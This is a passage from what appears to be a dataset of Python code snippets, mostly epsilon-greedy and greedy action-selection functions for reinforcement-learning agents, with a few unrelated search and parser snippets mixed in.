self.__epsilon:\n return self.choose_uniform(valid_actions)\n return self.choose_greedy(state, valid_actions)", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n\n def policy_fn(observation):\n\n # get random number\n random_number = random.uniform(0, 1)\n\n # get actions with maximum value\n greedy_actions = np.argwhere(Q[observation] == np.amax(Q[observation])).squeeze()\n if not len(greedy_actions.shape):\n greedy_actions = [greedy_actions]\n action = random.choice(greedy_actions)\n\n # if number less than epsilon, get random other actions\n if random_number <= epsilon:\n all_actions = list(range(0, nA))\n if not len(greedy_actions) == nA:\n action = random.choice(all_actions)\n\n return int(action)\n\n return policy_fn", "def make_epsilon_greedy_policy(self, Q, epsilon, nA):\n\n def policy_fn(observation,p):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q=Q(observation,p)\n\n best_action = np.argmax(q)\n print(\"action called:\",self.env.action_labels[best_action])\n A[best_action] += (1.0 - epsilon)\n return A\n\n return policy_fn", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n best_action = np.argmax(Q[observation])\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def _epsilon_greedy(self, info_state, legal_actions, epsilon):\n probs = np.zeros(self._num_actions)\n if np.random.rand() < epsilon:\n action = np.random.choice(legal_actions)\n probs[legal_actions] = 1.0 / len(legal_actions)\n else:\n info_state = np.reshape(info_state, [1, -1])\n q_values = self._session.run(\n self._q_values, feed_dict={self._info_state_ph: info_state})[0]\n legal_q_values = q_values[legal_actions]\n action = legal_actions[np.argmax(legal_q_values)]\n probs[action] = 1.0\n return action, probs", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions,\n dtype = float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n\n def policyFunction(state):\n Action_probabilities = np.ones(num_actions,\n dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(observation)\n# print(q_values)\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n if random.random() < (1 - epsilon):\n return np.argmax(Q[observation])\n else:\n return random.choice(np.arange(nA))\n\n return policy_fn", "def greedy(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def greedy(self) -> Action:\n return NotImplemented", "def epsilonGreedyChooser(normalAction, state, stepsDone):\n epsThreshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1. * stepsDone / EPS_DECAY)\n randomSample = random.random()\n if randomSample > epsThreshold:\n action = normalAction(state).max(1)[1].view(1, 1)[0].item()\n #print(action)\n return action\n else:\n return ENVIRONMENT.action_space.sample()", "def make_epsilon_greedy_policy(action_count: int, epsilon=0.0, q: dict = None,\n estimator=None, distribute_prob=True):\n if q is None and estimator is None:\n raise ValueError('Cannot make policy: both q and estimator are none')\n\n def policy_func(observation, eps=epsilon):\n actions = np.ones(action_count, dtype=float) * eps / action_count\n if q is not None:\n q_values = q[observation]\n else:\n q_values = estimator.predict(observation)\n if distribute_prob:\n best_actions = np.argwhere(q_values == np.max(q_values)).flatten()\n for i in best_actions:\n actions[i] += (1.0 - eps) / len(best_actions)\n else:\n best_action = np.argmax(q_values)\n actions[best_action] += (1.0 - eps)\n return actions\n\n return policy_func", "def __call__(self, state, q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]", "def greedy_policy(self, q, s):\n\t\tresult = []\n\t\tif q is None:\n\t\t\treturn result\n\t\tmax_val = q[0]\n\t\tfor action in self.feasible_actions_in_state(s):\n\t\t\tq_value = q[action]\n\t\t\tif q_value == max_val:\n\t\t\t\tresult.append(action)\n\t\t\telif q_value > max_val:\n\t\t\t\tresult = [action]\n\t\t\t\tmax_val = q_value\n\t\treturn result", "def greedy(self, state, timestep, epsilon=0):\n\n counts = np.bincount(self.call_locs, minlength=self.num_nodes)\n # print(self.lengths)\n # print(counts)\n score = self.lengths @ counts\n action = []\n for _ in range(self.num_ambulance):\n node = np.argmin(score)\n action.append(node)\n score[node] = 99999999\n return action", "def greedy_eps(self, Q):\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a", "def eps_greedy_policy(q_values, eps, forbidden_actions):\r\n\r\n q_values[forbidden_actions] = np.NINF\r\n indices = torch.nonzero(q_values == q_values.max())\r\n random_index = random.randint(0, indices.shape[1]-1)\r\n best_action_index = indices[random_index]\r\n l = len(q_values)\r\n n_forbidden_actions = np.count_nonzero(forbidden_actions)\r\n p = eps / (l-n_forbidden_actions)\r\n\r\n policy = np.full([l], p)\r\n policy[forbidden_actions] = 0\r\n policy[best_action_index] += 1 - eps\r\n\r\n return policy", "def get_greedy_action(Q, obs):\n obs = Q.xp.asarray(obs[None], dtype=np.float32)\n with chainer.no_backprop_mode():\n q = Q(obs).data[0]\n return int(q.argmax())", "def epsilon_greedy_move(self):\n\n # get the current state\n state, _ = self.board.bit_board_representation()\n \n # choose the move to play\n is_exploring_move = False\n if random.random() < self.epsilon:\n # exploration\n action = self.board.random_move()\n is_exploring_move = True\n else:\n # exploitation\n action, _ = self.board.greedy_action_move(self.target_network)\n\n action_index = action\n if self.board.player == CONST.BLACK:\n action_index = action + 9\n \n # play the epsilon greedy move\n self.board.play_move(action)\n \n # add the experience to the experience buffer if the move was not an exploration move\n if not is_exploring_move:\n reward = self.board.reward()\n not_terminal = self.board.not_terminal_int()\n succ_state, succ_player = self.board.bit_board_representation()\n succ_legal_moves = self.board.legal_moves\n self.experience_buffer.add(state, action_index, reward, not_terminal, succ_state, succ_player, succ_legal_moves)", "def policies(self, QTable, epsilon, state, next_states, action_to_do): # Inspiration from https://www.geeksforgeeks.org/q-learning-in-python/?fbclid=IwAR1UXR88IuJBhhTakjxNq_gcf3nCmJB0puuoA46J8mZnEan_qx9hhoFzhK8\r\n num_actions = 5 # 5 actions-value, [moved_out, into_goal, send_opp_home, send_self_home, move_token] \r\n def epsilonGreedyPolicy(): \r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n valid_act_len = len(np.where(valid_actions==True)[0])\r\n\r\n Action_probabilities = np.ones(num_actions, dtype = float) * epsilon / valid_act_len # divides probability based on number of valid actions and epsilon (each 0.025 if 4 actions) \r\n Action_probabilities = np.multiply(Action_probabilities, valid_actions)\r\n\r\n # If same values in QTable choose random valid action \r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n Action_probabilities[best_action] += (1.0 - epsilon) # Assigns rest probability to best action so probability sums to 1\r\n\r\n return Action_probabilities \r\n\r\n def greedyPolicy():\r\n tmp_state = str(state.state[0])\r\n valid_actions = np.append(action_to_do, True) # the True appended is move_token\r\n\r\n Action_probabilities = np.zeros(num_actions, dtype = float)\r\n\r\n best_action = np.argmax(QTable[tmp_state]) # Find index of action which gives highest QValue\r\n # Check if valid action else find new best action\r\n if not valid_actions[best_action]:\r\n actions = np.argsort(-QTable[tmp_state]) # descending order of action values\r\n for i in range(len(valid_actions)):\r\n if valid_actions[actions[i]]:\r\n best_action = actions[i]\r\n break\r\n\r\n\r\n Action_probabilities[best_action] += 1.0\r\n return Action_probabilities\r\n\r\n\r\n if(self.__chosenPolicy == \"epsilon greedy\"):\r\n return epsilonGreedyPolicy \r\n if(self.__chosenPolicy == \"greedy\"):\r\n return greedyPolicy", "def EpsGreedy(self, actions, game_state):\n if random.random() < self.epsilon:\n return random.choice(actions)\n else:\n return self.best_action(actions, game_state)", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n print(f'q_values: {q_values}')\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def epsilon_greedily_update_policy(self, current_Q, iterations_completed):\n iteration = iterations_completed+1\n # epsilon = min(1/np.log(iterations_completed+.0001),1)\n # epsilon = 1/iteration\n epsilon = 0.1\n def new_policy(state):\n heads = True if random.random() < epsilon else False # Flip our epsilon greedy coin\n if heads: # If heads comes up, choose random action\n return random.randint(0, self.nA-1)\n else: # If tails comes up, choose greedy option\n return np.argmax(current_Q[state]['Q(s,a)'])\n return new_policy", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\r\n def policy_fn(observation):\r\n A = np.ones(nA, dtype=float) * epsilon / nA\r\n q_values = estimator.predict(observation)\r\n best_action = np.argmax(q_values)\r\n A[best_action] += (1.0 - epsilon)\r\n return A\r\n return policy_fn", "def takeAction(self, state):\n # go greedy or not?\n if random.uniform(0, 1) < self.epsilon:\n # greedy selection\n # find best action\n allActions = torch.stack(\n tuple(torch.cat((state.strengths, state.focus, changes)) for changes in self.actionSet))\n evaluation = self.q.evaluateBunch(allActions)\n action = Action(state, self.actionSet[evaluation.argmax()])\n return action\n else:\n # random selection\n return Action(state, random.choice(self.actionSet))", "def greedy():\n return constant(0)", "def q_greedify_policy(env, V, pi, s, gamma):\n ### START CODE HERE ###\n ##q(s,a)=sigma(P(ss')*(gamma*V(s')+R(s,a,s'))\n q = np.zeros((env.action_space.n))\n for idx, action in enumerate(range(env.action_space.n)):\n for prob_next_state, next_state, reward_next_state, done in env.P[s][action]:\n q[idx] += prob_next_state * ((gamma * V[next_state]) + reward_next_state)\n\n greedy_action = np.argmax(q)\n # print(greedy_action)\n for action, action_prob in enumerate(pi[s]):\n if action == greedy_action:\n print(action, greedy_action)\n pi[s][action] = 1\n else:\n pi[s][action] = 0", "def choose_action(self, state, epsilon_greedy=False):\n chosen_action = None\n if epsilon_greedy:\n if np.random.rand() <= self.epsilon:\n print('random actions')\n\n # choose random action\n chosen_action = random.choice(self.actions)\n\n else:\n print('argmax')\n\n # find the action with greatest Q value\n maxQ = -float(\"inf\")\n for action in self.actions:\n input_data = np.asarray(state + action).reshape(self.OUTPUT_DIM, self.INPUT_DIM)\n Q = self.model.predict(input_data)\n if Q > maxQ:\n maxQ = Q\n chosen_action = action\n\n else:\n\n # policy rollout\n maxQ = -float(\"inf\")\n for action in self.actions:\n input_data = np.asarray(state + action).reshape(self.OUTPUT_DIM, self.INPUT_DIM)\n Q = self.model.predict(input_data)\n if Q > maxQ:\n maxQ = Q\n chosen_action = action\n\n return chosen_action", "def __act__(\n self,\n t: int\n ) -> Action:\n\n if self.random_state.random_sample() < self.epsilon:\n a = self.random_state.choice(self.most_recent_state.AA)\n self.epsilon *= (1 - self.epsilon_reduction_rate)\n else:\n a = self.greedy_action\n\n return a", "def epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon):\n\n new_policy = epsilon * np.ones((nS, nA)) / nA # = epsilon / m, where m is the number of Actions, nA\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: IF TWO ACTIONS HAVE THE SAME MAXIMUM Q VALUE, THEY MUST BOTH BE EXECUTED EQUALLY LIKELY.\n # THIS IS IMPORTANT FOR EXPLORATION. This might prove useful:\n # https://stackoverflow.com/questions/17568612/how-to-make-numpy-argmax-return-all-occurrences-of-the-maximum\n \n # print(\"new_policy = {0}\".format(new_policy))\n \n for s_t in range (0, nS):\n # print(\"old_policy[{0}] = {1}\".format(s_t, new_policy[s_t]))\n # print(\"Q_value[{0}] = {1}\".format(s_t, Q_value[s_t]))\n Q_list = np.argwhere(Q_value[s_t] == np.amax(Q_value[s_t])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n # print(\"Q_list: \" + str(Q_list))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n # print(\"max_Q: \" + str(max_Q))\n \n # A_star = new_policy[s_t][max_Q]\n # print(\"A_star: \" + str(A_star))\n \n new_policy[s_t][max_Q] += 1 - epsilon # for the chosen maximal index of Q, set the polocy to epsilon/m + 1 - epsilon\n # print(\"new_policy[{0}] = {1}\".format(s_t, new_policy[s_t]))\n \n # for a_t in range (0, nA):\n # if a_t in Q_list:\n # new_policy[s_t][a_t] += (1 - epsilon) / len(Q_list)\n\n ############################\n # print(\"new_policy = {0}\".format(new_policy))\n return new_policy", "def select_action(self, state: np.ndarray) -> np.ndarray:\n # epsilon greedy policy\n # pylint: disable=comparison-with-callable\n if self.epsilon > np.random.random():\n selected_action = np.array(self.env.action_space.sample())\n else:\n with torch.no_grad():\n state = self._preprocess_state(state, self.device)\n selected_action = self.dqn(state).argmax()\n selected_action = selected_action.cpu().numpy()\n\n # Decay epsilon\n self.epsilon = max(\n self.epsilon\n - (self.max_epsilon - self.min_epsilon) * self.hyper_params.epsilon_decay,\n self.min_epsilon,\n )\n\n return selected_action", "def select_action(self, q_values, is_training):\n # if is_training then do epsilon decay,\n # otherwise use constant epsilon = 0.05\n if is_training:\n if self.epsilon > self.end:\n self.epsilon -= self.decay_stepsize\n else:\n self.epsilon = 0\n return super(LinearDecayGreedyEpsilonPolicy, self).select_action(q_values)", "def epsilon_greedy_probs(self, nA, Q_s, i_count, eps=None):\r\n epsilon = 1.0 / i_count\r\n if eps is not None:\r\n epsilon = eps\r\n \r\n policy_s = np.ones(nA) * epsilon / nA\r\n policy_s[np.argmax(Q_s)] = 1 - epsilon + (epsilon / nA)\r\n return policy_s", "def update_q_table(self, cur_state, action, reward, next_state):\n new_max_q = max(self.q_val_table[next_state])\n new_value = reward + self.gamma * new_max_q\n\n old_value = self.q_val_table[cur_state][action]\n self.q_val_table[cur_state][action] = old_value + self.alpha * (new_value - old_value)\n\n # Decay epsilon_greedy\n self.e_greedy_prob = self.exp_decay(self.e_greedy_prob)", "def select_action(engine, observation):\n with torch.no_grad():\n dqn.eval()\n if torch.rand(1).item() < epsilon:\n return random_action(observation)\n else:\n return dqn(observation).greedy()", "def epsilon_greedy_policy(network, eps_end, eps_start, eps_decay, actions, device):\n def policy_fn(observation, steps_done):\n sample = np.random.random()\n eps_threshold = eps_end + (eps_start - eps_end) * math.exp(-1. * steps_done * eps_decay)\n if sample > eps_threshold:\n with torch.no_grad():\n if observation.dim() == 3:\n observation = observation.unsqueeze(0)\n elif observation.dim() < 3:\n NotImplementedError(\"Wrong input dim\")\n\n values = network.forward(observation.to(device))[0]\n best_action = torch.max(values, dim=0)[1]\n return best_action.cpu().item(), eps_threshold\n else:\n # return torch.tensor(np.random.randint(low=0, high=num_actions), dtype=torch.long), eps_threshold\n return random.choice(actions), eps_threshold\n return policy_fn", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy_next_action(self, state):\n max_val = float('-inf')\n if self.verbose:\n cells = []\n max_candidates = {}\n for i in range(3):\n for j in range(3):\n if state[i][j] == VALUES.EMPTY:\n val = self.q_value((state, (i, j)))\n if val >= max_val:\n max_val = val\n max_move = (i, j)\n max_candidates[max_move] = val\n if self.verbose:\n cells.append('{0:.3f}'.format(val).center(6))\n elif self.verbose:\n cells.append(state[i][j].center(6))\n if self.verbose:\n self.logger.info(BOARD.format(*cells))\n possible_actions = [k for k, v in max_candidates.items() if v == max_val]\n action = random.choice(possible_actions) if len(possible_actions) > 0 else None\n return action", "def qlearning(alpha, gamma, epsilon, episodes, max_steps, n_tests, render = False, test=False):\n env = gym.make('Taxi-v2')\n n_states, n_actions = env.observation_space.n, env.action_space.n\n Q = init_q(n_states, n_actions, type=\"ones\")\n timestep_reward = []\n for episode in range(episodes):\n print(f\"Episode: {episode}\")\n s = env.reset()\n a = epsilon_greedy(Q, epsilon, n_actions, s)\n t = 0\n total_reward = 0\n done = False\n while t < max_steps:\n if render:\n env.render()\n t += 1\n s_, reward, done, info = env.step(a)\n total_reward += reward\n a_ = np.argmax(Q[s_, :])\n if done:\n Q[s, a] += alpha * ( reward - Q[s, a] )\n else:\n Q[s, a] += alpha * ( reward + (gamma * Q[s_, a_]) - Q[s, a] )\n s, a = s_, a_\n if done:\n if render:\n print(f\"This episode took {t} timesteps and reward: {total_reward}\")\n timestep_reward.append(total_reward)\n break\n if render:\n print(f\"Here are the Q values:\\n{Q}\\nTesting now:\")\n if test:\n test_agent(Q, env, n_tests, n_actions)\n return timestep_reward", "def epsilon_greedy_agent(bandit, iterations, epsilon = 0.2, initial_rounds = 1):\n\n pay_offs = dict()\n\n for i in range(iterations):\n # sometimes randomly pick an action to explore\n if random.random() < epsilon or i < initial_rounds:\n a = random.choice(bandit.actions)\n # otherwise pick the best one thus far\n else:\n # check for the lever with the best average payoff\n new_dict = {}\n for key,val in pay_offs.items():\n new_dict[key] = np.mean(val) \n a = max(new_dict, key=new_dict.get)\n\n r = bandit.sample(a)\n\n #update rewards\n if a in pay_offs:\n pay_offs[a].append(r)\n else:\n pay_offs[a] = [r]\n \n yield a, r", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def reset_for_new_run(\n self,\n state: State\n ):\n\n super().reset_for_new_run(state)\n\n self.epsilon = self.original_epsilon\n self.greedy_action = list(self.Q.keys())[0]", "def tabular_one_step_q(env, policy, state, Q, alpha=0.5, discount_factor=1.0):\n\n # choose A from S using policy derived from Q (epsilon-greedy)\n action = policy(state)\n\n # take action, observe R, S'\n (next_state, reward, done, probability) = env.step(int(action))\n\n # get max action-value\n max_action_value = max([Q[next_state][a] for a in range(env.action_space.n)])\n\n # update Q\n Q[state][action] = Q[state][action] + alpha * (\n reward + discount_factor * max_action_value - Q[state][action]\n )\n\n # copy state_tilde and action_tilde to be next steps.\n state = next_state\n\n return action, state, reward, done", "def calcQ(self,thisObs,next_action,reward):\n \n thisObs_tup=(thisObs['volume'],thisObs['time'])\n lastAction_tup=(self.lastAction['vol'],self.lastAction['price'])\n lastObs_tup=(self.lastObs['volume'],self.lastObs['time'])\n lastQvalue=0\n maxQvalue=0\n temp_action=()\n \n if (len(self.Qvalue)>0): \n \"\"\"Searches the Q-value dictionary\"\"\"\n for key,value in self.Qvalue.iteritems():\n \n if (key[0][0]== thisObs_tup[0] and key[0][1]==thisObs_tup[1]):\n if (value > maxQvalue):\n maxQvalue=value\n temp_action = key[1]\n \n if (key[0][0]== lastObs_tup[0] and key[0][1]==lastObs_tup[1] and \n key[1][0]== lastAction_tup[0] and key[1][1]==lastAction_tup[1]):\n \n lastQvalue=self.Qvalue[key]\n #print(\"This state was already encoutered and updated\")\n \n self.Qvalue[(lastObs_tup,lastAction_tup)]=lastQvalue+alpha*(reward+(gamma*maxQvalue)-lastQvalue) \n #print 'The Qtable is',self.Qvalue\n if (len(temp_action)!=0):\n #print \"I found a greedy action\" \n next_action['vol'] = temp_action[0]\n next_action['price']=temp_action[1]\n else: \n next_action=self.return_random_action(thisObs)\n \n return next_action", "def test_greedy_strategy():\n tiles = Tiles(800, 100)\n board = Board(800, 100, tiles)\n player = Player('Alfred', board, 'black')\n ai = AI(board, player)\n for i in range(board.count//2 + 1, board.count - 1):\n board.add_tile(i, board.count//2 - 1, 'black')\n assert ai.greedy_strategy()[0] == (board.count - 1, board.count//2 - 1)\n assert len(ai.greedy_strategy()[1]) == board.count//2 - 1\n board.add_tile(board.count//2 - 1, 0, 'white')\n for i in range(1, board.count - 1):\n if board.tiles_list[board.count//2 - 1][i] is None:\n board.add_tile(board.count//2 - 1, i, 'black')\n else:\n board.tiles_list[board.count//2 - 1][i].color = 'black'\n assert ai.greedy_strategy()[0] == (board.count//2 - 1, board.count - 1)\n assert len(ai.greedy_strategy()[1]) == board.count - 2", "def choose_action(Q_table, state, epsilon):\n if random.uniform(0, 1) < epsilon:\n return random.choice(ACTIONS)\n else:\n actions = Q_table.get(state.__str__())\n if actions is None:\n return random.choice(ACTIONS)\n else:\n return PlayerAction(np.argmax(actions))", "def test_greedy_one_or_more():\n grammar = r\"\"\"\n S: A+ A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 6\n\n # But greedy variant has only one solution where first A+! collects all tokens.\n grammar = r\"\"\"\n S: A+! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def greedy(self) -> torch.Tensor:\n return self.with_batch_dim(self.q_values).argmax(1).squeeze()", "def greedy(self):\n n_step_t = self.filter['n_step_t']\n n_traj = self.filter['n_traj']\n traj = self.filter['traj']\n steps = [0 for i in xrange(n_step_t)]\n for i in xrange(n_traj):\n n_step = traj[i]['n_step']\n for j in xrange(n_step):\n steps[j] += 1\n self.filter['steps'] = steps\n \n return", "def epsilon_greedy(deques: List[deque],\n model: BetaBernoulli,\n mode: str,\n topk: int = 1,\n epsilon: float = 0.1,\n **kwargs) -> Union[int, List[int]]:\n if random.random() < epsilon:\n return random_sampling(deques, topk)\n else:\n samples = model.eval\n if mode == 'max':\n ranked = np.argsort(samples)[::-1]\n elif mode == 'min':\n ranked = np.argsort(samples)\n\n if topk == 1:\n for j in range(len(deques)):\n category = ranked[j]\n if len(deques[category]) != 0:\n return category\n else:\n categories_list = []\n candidates = set([i for i in range(len(deques)) if len(deques[i]) > 0])\n # when we go through 'ranked' and len(categories_list) < topk, topk sampling is reduced to top 1\n if len(candidates) < topk:\n return epsilon_greedy(deques, model, mode, topk=1)\n else:\n for category in ranked:\n if category in candidates:\n categories_list.append(category)\n if len(categories_list) == topk:\n return categories_list", "def select_action(self, state, epsilon=None):\n if epsilon == None:\n epsilon = self.epsilon\n \n if np.random.random() > epsilon:\n # greedy action selection\n return self.get_optimal_action(state)\n \n else:\n # random action selection\n return np.random.randint(0, self.num_actions)", "def greedy_policy(self):\n return defaultdict(lambda: 0)", "def e_greedy_sampling(self, k_array, reward_array, number_slots):\n\n # successes and total draws\n success_count = reward_array.sum(axis=1)\n total_count = k_array.sum(axis=1)\n\n # ratio of successes vs total\n success_ratio = success_count / total_count\n\n # choosing best greedy action or random depending with epsilon probability\n if np.random.random() < self.epsilon:\n\n # returning random action, excluding best\n return np.random.choice(np.delete(list(range(number_slots)), np.argmax(success_ratio)))\n\n # else return best\n else:\n\n # returning best greedy action\n return np.argmax(success_ratio)", "def qlearning(env, iterations=1000, gamma=0.9, alpha=0.1):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n policy = np.ones((env.nS,env.nA))/env.nA\n epsilon = 1\n s_t1 = env.reset() # reset the environment and place the agent in the start square\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n curr_state = s_t1\n \n start = time.time() # to time how long convergence takes\n print(\"---Q Learning---\\nTraining Started.\")\n \n for k in range (1, iterations):\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n epsilon = 1/k\n curr_action, reward, new_state, done = take_one_step(env, policy, curr_state)\n new_action = sample_action(policy, new_state)\n Q_value[curr_state, curr_action] = Q_value[curr_state, curr_action] + alpha * (reward + gamma * (Q_value[new_state, np.argmax(Q_value[new_state])]) - Q_value[curr_state, curr_action])\n \n # epsilon-greedy policy update\n Q_list = np.argwhere(Q_value[curr_state] == np.amax(Q_value[curr_state])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n for a in range (nA):\n if a == max_Q:\n policy[curr_state][a] = epsilon/nA + (1 - epsilon) # for the chosen maximal index of Q, set the policy to epsilon/m + 1 - epsilon\n else:\n policy[curr_state][a] = epsilon/nA \n \n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"policy = {0}\".format(policy))\n \n if done:\n curr_state = env.reset() # reset the environment and place the agent in the start square\n curr_action = sample_action(policy, curr_state)\n else:\n curr_state = new_state\n curr_action = new_action\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n \n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def get_epsilon_action(epsilon, env, mean_reward_per_bandit):\n explore = np.random.uniform() < epsilon\n\n if explore:\n return env.action_space.sample()\n else:\n return np.argmax(mean_reward_per_bandit)", "def aStarSearch(problem, heuristic=nullHeuristic):\n\n frontier = util.PriorityQueue()\n #print 'Create frontier'\n initial_state = problem.getStartState()\n initial_node = node2(initial_state, 0, [], 0 , evaluationFunction(problem, 0, heuristic, initial_state))#(state,depth,path_actions,path_cost,f)\n\n frontier.push(initial_node, initial_node.f)\n #print 'Push ',repr((initial_node.state, initial_node.f))\n frontierSet = set([(initial_node.state, initial_node.f)])\n explored = set() #initialize the explored set to be empty\n\n while True:\n if frontier.isEmpty() == True: raise Exception, \"The frontier was emptied\"#if the frontier is empty then return failure\n currNode = frontier.pop()#HERE1\n frontierSet.remove((currNode.state, currNode.f))\n #print 'Remove',repr((currNode.state, currNode.f))\n #print 'State: ' + repr(currNode.state) + '. Depth: ' + repr(currNode.depth) + '. Path Cost: ' + repr(currNode.path_cost) + '. EvalFunc: ' + repr(currNode.f) + '. Path Actions: ' + repr(currNode.path_actions) + '.\\n'\n if problem.isGoalState(currNode.state) == True:\n print 'Goal reached!'\n return currNode.path_actions\n explored.add(currNode.state)\n for succ in problem.getSuccessors(currNode.state):\n succState = succ[0]\n succAction = succ[1]\n succActionCost = succ[2]\n\n #print 'Succ: ',repr((succState, succAction, succActionCost))\n succEvalFunc = evaluationFunction(problem, currNode.path_cost + succActionCost, heuristic, succState)\n #print 'State: %s. Heuristic : %s. h = %s. g = %s. f = %s' % (succState, repr(heuristic), heuristic(succState, problem), currNode.path_cost + succActionCost , succEvalFunc)\n succNode = node2(succState, currNode.depth + 1, currNode.path_actions + [succAction,], currNode.path_cost + succActionCost, succEvalFunc)\n if (succNode.state not in explored):\n \"\"\"Aca si hay que verificar si es que ya esta en la frontera porque es formato FIFO.\n Entonces los nodos que estan en la lista necesariamente van a ser\n verificados antes de que se vuelva a insertar otro, cumpliendo con el algoritmo.\n \"\"\"\n\n StateInFrontierSet = False\n ExistsBetterPriority = False\n for frontierSet_node in frontierSet:\n if (succNode.state == frontierSet_node[0]):\n StateInFrontierSet = True\n if (succNode.f < frontierSet_node[1]):\n ExistsBetterPriority = True\n frontierSet.remove(frontierSet_node)\n #print 'Remove ',repr((frontierSet_node[0], frontierSet_node[1]))\n\n #Recurso'i:\n for prio, count, frontierNode in frontier.heap:\n if frontierNode.state == succNode.state:\n frontier.heap.remove((prio, count, frontierNode))\n \"\"\"\n Recurso'i. Hay que cambiar la estructura de los nodos para que contenga solo el action_cost, en lugar del path_cost\n y para guardar la solucion tener una estructura aparte a la que se le van appendeando las acciones,\n o 